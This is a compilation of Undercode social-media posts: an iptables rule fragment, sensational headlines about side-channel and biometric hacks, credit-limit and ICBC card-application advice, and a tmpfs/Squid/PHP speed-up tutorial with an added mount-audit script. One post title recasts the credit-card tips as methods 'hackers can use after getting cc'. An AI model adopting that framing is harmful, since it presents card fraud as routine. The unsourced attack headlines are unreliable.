/sbin/iptables -A INPUT -p udp -i eth1 --dport 53 -j ACCEPT
# Return traffic to unprivileged ports on eth0
/sbin/iptables -A INPUT -p tcp -i eth0 -m state --state ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT
/sbin/iptables -A INPUT -p udp -i eth0 -m state --state ESTABLISHED,RELATED -m udp --dport 1024: -j ACCEPT
# These two echo-request rules come after the type 8 DROP above, so they are never reached
/sbin/iptables -A INPUT -p icmp --icmp-type echo-request -j LOG --log-level 2
/sbin/iptables -A INPUT -i eth0 -p icmp --icmp-type echo-request -j DROP
# Log traffic to ports 135 and 137-139
/sbin/iptables -A INPUT -p tcp -m multiport --destination-port 135,137,138,139 -j LOG
/sbin/iptables -A INPUT -p udp -m multiport --destination-port 135,137,138,139 -j LOG
/sbin/iptables -A INPUT -i eth0 -p tcp --dport 2000 -j ACCEPT
/sbin/iptables -A INPUT -i eth0 -p tcp --dport 2001 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i eth1 -m state --state ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT

WRITTEN BY UNDERCODE

🦑 Incredible hacking techniques, by Undercode
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) A slip of the "hand" will leak the password

> The heat left on the keyboard after a finger has pressed the keys can leak the password!

> SIM card hijacking leaves your phone unable to make calls or access the Internet, and the passwords of Google and FB accounts are changed as well
"One finger" ATM withdrawal is convenient and safe! Japanese expert:

> A digital camera photo of the palm is enough to work out the finger vein map in 10 minutes
AI can generate fake fingerprints

2) Powerful hacker attacks through "hearing"

> "Dolphin Attack" technology can send sounds that human ears cannot hear to smart voice assistants

> "Mosquito" proof-of-concept attack uses a speaker or headset to transfer data from a networked or isolated computer
Current noise can be used to "listen" to your screen
A speaker or headset can transfer computer data

3) Everything is horrible

Webcam at the checkout counter secretly films credit card information
Credit card information leaked: beware of webcams when paying!
So fragile! Shouting can crash a computer system

4) Crash! This can also be horrible

Even if you are not connected to the Internet, changes in current on the power line can be used to steal computer data.
Retreat practice! Hundreds of prisoners used a loophole in the electronic system "JPay" to jointly steal US$225,000 (about 6.89 million Taiwan dollars)

WRITTEN BY UNDERCODE

🦑 Four bank card usage methods - some hackers can use them after getting cc
t.me/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Multi-dimensional and multi-scenario consumption. Shopping in malls, supermarket consumption, restaurant meals, airport ticket purchases, etc. Multi-scenario and multi-dimensional consumption is the way of using cards that banks prefer.

2) Monthly credit card spending accounts for more than half of the credit card limit. Banks like this way of using cards, because it shows that the cardholder really needs to swipe the card. If this demand lasts for more than 3 months and there is no abnormal use of the card, the bank will basically give you an increase.

3) Pay in installments often and withdraw cash often. These two are the main sources of revenue for bank credit card centers. The installment fee, cash withdrawal interest and commission fee are all paid by the cardholder to the bank. If cardholders often need installments and cash withdrawals, which brings profits to the bank's credit card center, of course the bank likes to raise funds for you.

4) Repay on time. All the monthly repayments should be repaid with no overdue behavior, which indicates that the cardholder will not bring bad debt risk to the bank, and the bank likes such quality customers.


WRITTEN BY UNDERCODE

🦑 How to apply for ICBC Credit Card? What are the application requirements?
T.me/underCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

There are three main requirements to apply for an ICBC credit card.
Let me introduce them in detail below.

The most important requirements for applying for an ICBC credit card are the following three conditions:

1. Age requirements: Generally a citizen who has reached the age of eighteen; you need to submit an identity document for certification.

2. Stable repayment ability: Generally you are required to provide proof of work and income. In order to increase the application success rate and credit limit, it is generally recommended to provide proof of your own real estate, proof of your own vehicle, proof of bank assets, etc. The standards for issuing cards are different for each bank, depending on the bank's requirements.

3. Good credit status: that is, you are required to have no bad credit history, and the bank will inquire on its own.

ICBC Credit Card Master Card Processing Conditions

A natural person who is over 18 years of age and has full capacity for civil conduct, has a work unit or a fixed residence where the card issuer is located, and has a stable income above the local average level can apply for a Peony credit card at any local ICBC business outlet.

ICBC Credit Card Gold Card Requirements

If you want to apply for an ICBC Gold Credit Card, in addition to meeting the above conditions, there are some other conditions.

1. The applicant is a VIP customer of ICBC;

2. The applicant's monthly income is over 10,000 and is very stable;

3. At least a four-star ICBC customer.

Note: If, when you apply for a credit card, you choose "Yes" under "Unable to approve the card grade, agree with the bank to automatically issue other grades of products", then when the gold card is not approved, a general card may be issued for you.

If the gold card application is unsuccessful, you are advised to use an ICBC credit card more often and repay it on the repayment date in order to gradually accumulate a good card record and lay a credit foundation for future gold card upgrades.

ICBC Credit Card Online Application Conditions

1. The conditions for the application of the main credit card of ICBC must be met;

2. The resident city has ICBC business outlets;

3. The city where the card is selected must be the place of your work unit or fixed residential address;

4. Fill in the credit card online application information as required.

Units apply for ICBC Peony Credit Card

All party and government agencies, social organizations, enterprises and institutions that have an account opening permit issued by the People's Bank of China, open a basic deposit account or a general deposit account at an ICBC domestic branch, have legal personality, or are legally registered with relevant departments can apply for a Peony Unit Card (Business Card).

WRITTEN BY UNDERCODE

🦑 Speed Optimization - Use tmpfs to speed up your Linux server by undercode
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> cache files today and learned a trick: use the virtual disk to store squid and the PHP session. A lot faster!

1) By default the system mounts /dev/shm, which is the so-called tmpfs. Some people say it is different from a ramdisk (virtual disk). Like a virtual disk, tmpfs can use your RAM, but it can also use your swap partition for storage. Moreover, the traditional virtual disk is a block device and requires a command such as mkfs before you can really use it. tmpfs is a file system, not a block device; you just mount it and it will work.
tmpfs has the following advantages:
A dynamic file system size;

2) Another major benefit of tmpfs is its lightning speed. Because a typical tmpfs file system resides entirely in RAM, reading and writing can be almost instantaneous;

3) tmpfs data is not retained after a restart, because virtual memory is inherently volatile. So it is necessary to write some scripts for operations such as mounting and binding.

🦑 Okay, that was some theory and everyone is annoyed by it, so let's talk about my application :)

1) First, create a tmp folder in /dev/shm, and then bind it to the actual /tmp:
mkdir /dev/shm/tmp
chmod 1777 /dev/shm/tmp
mount --bind /dev/shm/tmp /tmp

2) Application example: 1. Squid cache directory settings
vi /etc/squid/squid.conf
Modify it to
cache_dir ufs /tmp 256 16 256

3) The first 256 here means using 256M of memory. I think using a ramdisk is not as good as using tmpfs directly: at least there is no need to run mkfs each time, and the size can also be changed dynamically. /tmp at this time is actually /dev/shm/tmp.

4) Then restart the service. OK, now all squid cache files are saved in the tmpfs file system, which is fast.

🦑 Optimization of PHP performance

1) For an Apache + PHP website with a large number of visits, there may be many temporary files under /tmp, such as session or some cache files; you can save them to tmpfs.

2) Saving the session there is very simple: just modify php.ini. Since I have bound /dev/shm/tmp to /tmp, it is not necessary to rewrite it. As for the cache files generated by the PHP program, that can only be changed in the PHP program itself.
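
An added check for the setup above (not part of the original post): the bind mount gives /tmp the same RAM budget and mount flags as /dev/shm, so this script audits a /proc/mounts-style listing for a missing size= cap and missing nosuid/nodev/noexec flags. The function names and both sample listings are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a /proc/mounts-style listing for the tmpfs-backed /tmp.
# Function names and both sample listings are constructed for illustration.

# Print "fstype options" of the last (topmost) mount on a mount point.
mount_entry() {  # $1 = mounts file, $2 = mount point
    awk -v mp="$2" '$2 == mp { e = $3 " " $4 } END { if (e != "") print e }' "$1"
}

# Print one finding per line; print nothing when nothing is flagged.
audit_tmpfs() {  # $1 = mounts file, $2 = mount point
    entry=$(mount_entry "$1" "$2")
    if [ -z "$entry" ]; then echo "not-mounted"; return 0; fi
    fstype=${entry%% *}
    opts=",${entry#* },"
    if [ "$fstype" != "tmpfs" ]; then echo "not-tmpfs:$fstype"; return 0; fi
    # nosuid/nodev/noexec stop a world-writable directory from hosting
    # setuid binaries, device nodes or directly executed files.
    for want in nosuid nodev noexec; do
        case "$opts" in *",$want,"*) ;; *) echo "missing:$want" ;; esac
    done
    # Without size=, tmpfs may grow to half of RAM by default.
    case "$opts" in *",size="*) ;; *) echo "missing:size" ;; esac
}

# Constructed: state after the bind mount above with no extra mount options.
sample_default() {
    printf '%s\n' '/dev/sda1 / ext4 rw,relatime 0 0' \
        'tmpfs /dev/shm tmpfs rw 0 0' \
        'tmpfs /tmp tmpfs rw 0 0'
}

# Constructed: /dev/shm mounted with a size cap and restrictive flags first.
sample_hardened() {
    printf '%s\n' '/dev/sda1 / ext4 rw,relatime 0 0' \
        'tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec,size=524288k 0 0' \
        'tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,size=524288k 0 0'
}

# Demo on the constructed listings; on a real host pass /proc/mounts instead.
demo_file=$(mktemp)
sample_default > "$demo_file"
echo "default:";  audit_tmpfs "$demo_file" /tmp
sample_hardened > "$demo_file"
echo "hardened:"; audit_tmpfs "$demo_file" /tmp
rm -f "$demo_file"
```

With squid's 256M cache_dir and PHP session files sharing the same tmpfs, the size= cap has to leave room for both.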

WRITTEN BY UNDERCODE